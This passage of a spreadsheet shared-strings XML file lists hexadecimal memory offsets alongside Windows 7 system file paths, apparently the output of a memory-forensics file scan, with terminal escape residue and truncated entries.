    <t>\Windows\System32\en-US\syncui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2a218</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00c.inf_x86_neutral_53fa05c2a4afede5\wiaca00</t>
  </si>
  <si>
    <t>0xded2a3c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\vsmraid.inf_x86_neutral_be11b7aaa746e92d\vsmraid.</t>
  </si>
  <si>
    <t>0xded2a480</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hidserv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2ac48</t>
  </si>
  <si>
    <t>0xded2b0d0</t>
  </si>
  <si>
    <t>0xded2b2b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cscui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2b4b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mpio.inf_x86_neutral_18f08f79e68b1972\mpio.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xded2b570</t>
  </si>
  <si>
    <t>0xded2b628</t>
  </si>
  <si>
    <t>0xded2b888</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_en-us_0ef70046e1d1b811.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2b940</t>
  </si>
  <si>
    <t>0xded2baa8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_da-dk_da67f50e291bdec5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2bb60</t>
  </si>
  <si>
    <t>0xded2bd30</t>
  </si>
  <si>
    <t>0xded2be50</t>
  </si>
  <si>
    <t>d.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2d0a8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dinput.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2d388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx006.inf_x86_neutral_6e4dca7de1f2cbe6\prnlx00</t>
  </si>
  <si>
    <t>0xded2d5d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MdSched.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2d9c8</t>
  </si>
  <si>
    <t>0xded2dcc8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2732487~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2dec8</t>
  </si>
  <si>
    <t>0xded2df80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2732487_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2e178</t>
  </si>
  <si>
    <t>0xded2e3e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fdprint.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2e7c0</t>
  </si>
  <si>
    <t>0xded2e878</t>
  </si>
  <si>
    <t>0xded2ea60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmeric2.inf_x86_neutral_ac9c3cb0b5fb00a9\mdmeric</t>
  </si>
  <si>
    <t>0xded2ede0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shimgvw.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2f450</t>
  </si>
  <si>
    <t>0xded2f820</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sti.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded2f9e0</t>
  </si>
  <si>
    <t>0xded2fc10</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_pla_rules_en-us_8cd2a7c250e636a2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded30318</t>
  </si>
  <si>
    <t>0xded30818</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3179573~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.0</t>
  </si>
  <si>
    <t>.cat_x001B_[</t>
  </si>
  <si>
    <t>0xded30b90</t>
  </si>
  <si>
    <t>r.dll_x001B_[0K_x001B_[</t>
  </si>
  <si>
    <t>139G</t>
  </si>
  <si>
    <t>0xded31378</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_engines_lexicon_en-gb_bd71d721f658dd56.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded314a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\WsatConfig\3.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded31db8</t>
  </si>
  <si>
    <t>0xded327b8</t>
  </si>
  <si>
    <t>0xded32f80</t>
  </si>
  <si>
    <t>0xded33b00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\audiodg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded34038</t>
  </si>
  <si>
    <t>0xded34160</t>
  </si>
  <si>
    <t>Data.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded34428</t>
  </si>
  <si>
    <t>0xded34738</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_delta_0f36d7d9b4f7293c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded34c10</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tcpipcfg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded34eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_wsearchidxpi_0000_2e6e3f1caf9fca20.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded35230</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded35440</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_subsetlist_2a1589056b6db300.cdf</t>
  </si>
  <si>
    <t>0xded357d0</t>
  </si>
  <si>
    <t>0xded35e58</t>
  </si>
  <si>
    <t>0xded35f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\Q9W3T96Q.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xded36038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2532531_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded36440</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\keyiso.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded36590</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc12.inf_x86_neutral_ff7295ba5a46d63f\Ph3xIB</t>
  </si>
  <si>
    <t>C12.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xded36ad0</t>
  </si>
  <si>
    <t>0xded36e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>0xded36eb8</t>
  </si>
  <si>
    <t>0xded37238</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netr28u.inf_x86_neutral_b42b25ec42f762c2\netr28u.</t>
  </si>
  <si>
    <t>0xded37548</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\imapi2.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded37800</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmar1.inf_x86_neutral_b0999a224b848025\mdmar1.in</t>
  </si>
  <si>
    <t>0xded37948</t>
  </si>
  <si>
    <t>0xded37a00</t>
  </si>
  <si>
    <t>0xded37e20</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ssText3d.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded383d8</t>
  </si>
  <si>
    <t>0xded38530</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homepremiumn_ce9583506532fcb0.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xded38718</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homepremiume_ce9583506532fca7.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xded38a60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00c.inf_x86_neutral_7bc7cec2e7b7c3ed\prnlx00</t>
  </si>
  <si>
    <t>0xded38de0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homebasic_341b792f755543ad.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded39038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\image.inf_x86_neutral_7a389207019f8699\image.inf_x001B_</t>
  </si>
  <si>
    <t>0xded392f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\findstr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded39960</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scrptadm.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded39c98</t>
  </si>
  <si>
    <t>0xded3a270</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\acpi.inf_x86_neutral_a1f4891fe0de4401\acpi.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xded3a5b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\userinit.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3a818</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_startern_f6228028229393f9.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xded3aa18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr007.inf_x86_neutral_5d5fc97500c2267d\mdmbr00</t>
  </si>
  <si>
    <t>0xded3aad0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ricoh.inf_x86_neutral_925e66fc0306537d\ricoh.inf_x001B_</t>
  </si>
  <si>
    <t>0xded3aeb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_startere_f6228028229393f0.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xded3b038</t>
  </si>
  <si>
    <t>0xded3b100</t>
  </si>
  <si>
    <t>0xded3b1f8</t>
  </si>
  <si>
    <t>\Windows\System32\VSSVC.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3b488</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmairte.inf_x86_neutral_5bc983e9703af897\mdmairt</t>
  </si>
  <si>
    <t>0xded3b948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\termkbd.inf_x86_neutral_339f71420b21f4a1\termkbd.</t>
  </si>
  <si>
    <t>0xded3ba68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_ultimate_fb35b2e019a373f7.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xded3be50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_ultimaten_3692f33fc09794ab.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xded3c3f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\efsadu.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3c938</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmcd.inf_x86_neutral_55a9c55fb48473ce\Mdmmcd.in</t>
  </si>
  <si>
    <t>0xded3c9f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_ultimatee_3692e229c097ae4c.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xded3cb70</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_starter_f622802873b12085.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xded3d390</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_calligraphy_7b7c7a996fa5cd3c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3d620</t>
  </si>
  <si>
    <t>er.ni.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3d9b8</t>
  </si>
  <si>
    <t>0xded3daf0</t>
  </si>
  <si>
    <t>\Users\Public\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3e038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\djsvs.inf_x86_neutral_836a3a3240941631\djsvs.inf_x001B_</t>
  </si>
  <si>
    <t>0xded3e620</t>
  </si>
  <si>
    <t>0xded3e788</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_festival_d2aa354bee3f11cc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3eb08</t>
  </si>
  <si>
    <t>0xded3ebc0</t>
  </si>
  <si>
    <t>0xded3f138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcodex.inf_x86_neutral_b39ddfe03c7a0e60\mdmcode</t>
  </si>
  <si>
    <t>0xded3f3b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\devenum.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3f638</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pnpui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3fa80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\calc.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded3ff18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_9f2c881475a483d6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded40160</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_f1386c432966667b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded402a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cxfalpal_ibv32.inf_x86_neutral_809fe20c75cbdcae\c</t>
  </si>
  <si>
    <t>xFalPal_IBV32</t>
  </si>
  <si>
    <t>0xded40458</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wave.inf_x86_neutral_a86dc645b68a1b2f\wave.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xded408d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_bitsextensions-server_7d542a16c26409f3</t>
  </si>
  <si>
    <t>0xded40c00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpn1.inf_x86_neutral_40a7e43b0adc056b\mdmpn1.in</t>
  </si>
  <si>
    <t>0xded40cb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_2650d8d30fee1fe9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded40f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdm3com.inf_x86_neutral_61b1d2017160ceb3\mdm3com.</t>
  </si>
  <si>
    <t>0xded41198</t>
  </si>
  <si>
    <t>0xded41418</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded41758</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded419c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Utilman.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded41d98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\PeerDistSvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded41f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wevtsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded42038</t>
  </si>
  <si>
    <t>0xded42378</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rasmans.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded42d98</t>
  </si>
  <si>
    <t>0xded42e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2532531_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded43160</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hnetcfg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded435e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imekr8_applets_4b4e797746aa967c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded43918</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnhp005.inf_x86_neutral_9307c57b91a7985e\prnhp00</t>
  </si>
  <si>
    <t>0xded439d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imekr8_46a67c6e42ef3b99.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded43db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imejp10_applets_bad04da37647b46c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded44a70</t>
  </si>
  <si>
    <t>0xded45038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodelservice_3.0.0.0_0000_2fd4d7f498bba769.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded45f40</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\werconcpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded46840</t>
  </si>
  <si>
    <t>\Windows\System32\gpsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded47038</t>
  </si>
  <si>
    <t>0xded49378</t>
  </si>
  <si>
    <t>0xded499b0</t>
  </si>
  <si>
    <t>0xded4a730</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx</t>
  </si>
  <si>
    <t>0xded4ab50</t>
  </si>
  <si>
    <t>0xded4b428</t>
  </si>
  <si>
    <t>0xded4b660</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\atl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded4b910</t>
  </si>
  <si>
    <t>\Windows\servicing\en-US\TrustedInstaller.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded4ba80</t>
  </si>
  <si>
    <t>0xded4d868</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmusrsp.inf_x86_neutral_50208ddd73116ac1\mdmusrs</t>
  </si>
  <si>
    <t>0xded4eb68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shsvcs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded4f480</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cryptsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded4f600</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WsmRes.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded4fcb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnokia.inf_x86_neutral_a8e9a41983d33a0b\mdmnoki</t>
  </si>
  <si>
    <t>0xded50190</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\kbdhid.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded502e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmusrf.inf_x86_neutral_6fbcae4419a7e461\mdmusrf.</t>
  </si>
  <si>
    <t>0xded50be8</t>
  </si>
  <si>
    <t>0xded50f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_sqlserver_7cfd5f3e72497ce1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded51148</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2853952~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded51298</t>
  </si>
  <si>
    <t>0xded51680</t>
  </si>
  <si>
    <t>0xded51900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3138378~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded51c30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4054518_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded51ce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3138910~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded52038</t>
  </si>
  <si>
    <t>0xded52720</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnttp.inf_x86_neutral_e4d850f8a1a26fe6\mdmnttp.</t>
  </si>
  <si>
    <t>0xded52938</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\alg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded52ad8</t>
  </si>
  <si>
    <t>0xded52c58</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_134_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded52d98</t>
  </si>
  <si>
    <t>\Windows\System32\virtdisk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded53630</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2732487_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded53818</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fwpuclnt.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded53a00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dtsh.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded53be0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr007.inf_x86_neutral_af94d26aafd1ca3a\prnbr00</t>
  </si>
  <si>
    <t>0xded53db0</t>
  </si>
  <si>
    <t>\Windows\hh.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded54038</t>
  </si>
  <si>
    <t>\Windows\WindowsUpdate.log_x001B_[0K_x001B_[32G</t>
  </si>
  <si>
    <t>0xded54550</t>
  </si>
  <si>
    <t>0xded54670</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-LanguagePackSetup%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded54a18</t>
  </si>
  <si>
    <t>0xded54ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004469_RTM~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded54eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3004469~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded551d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2732487~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded555c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pla.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded55ad0</t>
  </si>
  <si>
    <t>0xded55e00</t>
  </si>
  <si>
    <t>0xded55eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3004469~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded56038</t>
  </si>
  <si>
    <t>0xded56268</t>
  </si>
  <si>
    <t>0xded56598</t>
  </si>
  <si>
    <t>0xded56650</t>
  </si>
  <si>
    <t>0xded56900</t>
  </si>
  <si>
    <t>0xded56c30</t>
  </si>
  <si>
    <t>0xded56ce8</t>
  </si>
  <si>
    <t>0xded56f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_28_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded58da8</t>
  </si>
  <si>
    <t>\Windows\System32\wdscore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded591a0</t>
  </si>
  <si>
    <t>\Windows\CSC_x001B_[0K</t>
  </si>
  <si>
    <t>0xded59350</t>
  </si>
  <si>
    <t>\Windows\CSC\v2.0.6\pq_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5a4d8</t>
  </si>
  <si>
    <t>\Windows\CSC\v2.0.6\temp_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5a9e0</t>
  </si>
  <si>
    <t>0xded5ac90</t>
  </si>
  <si>
    <t>\Windows\CSC\v2.0.6_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5ae60</t>
  </si>
  <si>
    <t>sm_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5af18</t>
  </si>
  <si>
    <t>к€џ_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5b038</t>
  </si>
  <si>
    <t>0xded5b648</t>
  </si>
  <si>
    <t>0xded5b7f8</t>
  </si>
  <si>
    <t>\Windows\CSC\v2.0.6\namespace_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5b8b0</t>
  </si>
  <si>
    <t>\.\._x001B_[0K</t>
  </si>
  <si>
    <t>0xded5c3a0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\User Profile Service\HiveUploadTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5c990</t>
  </si>
  <si>
    <t>0xded5d628</t>
  </si>
  <si>
    <t>\Windows\System32\dsrole.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5d990</t>
  </si>
  <si>
    <t>0xded5dd48</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rspndr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5df80</t>
  </si>
  <si>
    <t>к€¤_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5eec8</t>
  </si>
  <si>
    <t>0xded5f338</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\umrdp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded5fb00</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded605e8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xded60be8</t>
  </si>
  <si>
    <t>\Windows\System32\mstask.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded60e10</t>
  </si>
  <si>
    <t>0xded61a90</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xded62170</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{C398D5B1-9379-42BD-A3E</t>
  </si>
  <si>
    <t>4-5977D158FE9</t>
  </si>
  <si>
    <t>0xded62670</t>
  </si>
  <si>
    <t>\Windows\System32\Sens.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded62a68</t>
  </si>
  <si>
    <t>\Windows\System32\dbghelp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded62b20</t>
  </si>
  <si>
    <t>\Windows\System32\slc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded62cc0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0000_x001B_[0K</t>
  </si>
  <si>
    <t>0xded631b8</t>
  </si>
  <si>
    <t>\Windows\System32\comres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded63d08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ReachFramework\8cb04a1f05b1b4efd593_x001B_[0K</t>
  </si>
  <si>
    <t>0xded64d18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tquery.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded64dd0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk_x001B_[0K</t>
  </si>
  <si>
    <t>0xded64eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.netframework_0000_fd6b5f63492732f4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded65a00</t>
  </si>
  <si>
    <t>\Windows\System32\rundll32.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded65f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\RAC\StateData\RacDatabase.sdf_x001B_[0K</t>
  </si>
  <si>
    <t>0xded66370</t>
  </si>
  <si>
